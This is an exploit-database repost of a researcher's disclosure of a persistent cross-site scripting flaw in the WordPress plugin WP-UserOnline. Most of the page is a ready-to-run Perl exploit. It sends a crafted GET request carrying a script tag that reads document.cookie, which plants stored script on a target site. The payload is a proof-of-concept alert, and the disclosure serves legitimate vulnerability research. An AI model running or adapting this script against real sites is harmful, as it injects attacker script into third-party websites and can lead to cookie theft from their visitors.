WordPress Plugin WP-UserOnline Persistent XSS vulnerability

🗓️ 24 Dec 2012 00:00:00Reported by MustLiveType

zdt🔗 0day.today👁 20 Views

WordPress Plugin WP-UserOnline Persistent XSS vulnerability with exploi

Hello list!

in 2010 I've disclosed multiple vulnerabilities (Cross-Site Scripting and Full path disclosure) in WordPress plugin WP-UserOnline (http://securityvulns.ru/Ydocument162.html, http://seclists.org/fulldisclosure/2010/Jul/8). And recently I've disclosed the exploit for persistent XSS vulnerability in WP-UserOnline. It must be interesting for those who want to test this vulnerability.

#!/usr/bin/perl
# Exploit for WP-UserOnline
# Copyright (C) MustLive 2010
# http://websecurity.com.ua
# Last update: 26.04.2010
##################################################
# Settings
##################################################
my $agent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"; # User Agent
my $url = "http://site"; # URL
my $xss = "/?<script>alert(document.cookie)</script>"; # XSS
##################################################
use IO::Socket;

my ($host,$sock,$content,$response);

$url =~ /http:\/\/(.+)\/?/;
$host = $1;
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80");
if (!$sock) {
	print "The Socket: $!\n";
	exit();
}
print $sock "GET $xss HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "User-Agent: $agent\n";
print $sock "Connection: close\n";
print $sock "\n\n";
while (<$sock>) {
	$content .= $_;
}
print "$url - ";
if ($content =~ /HTTP\/.\..\s+(\d+)/) {
	$response = $1;
}
if ($response == 200 or $response == 400) {
	print "OK\n";
}
else {
	print "Error: $response\n";
}

#  0day.today [2018-01-05]  #

24 Dec 2012 00:00Current

6.9Medium risk

Vulners AI Score6.9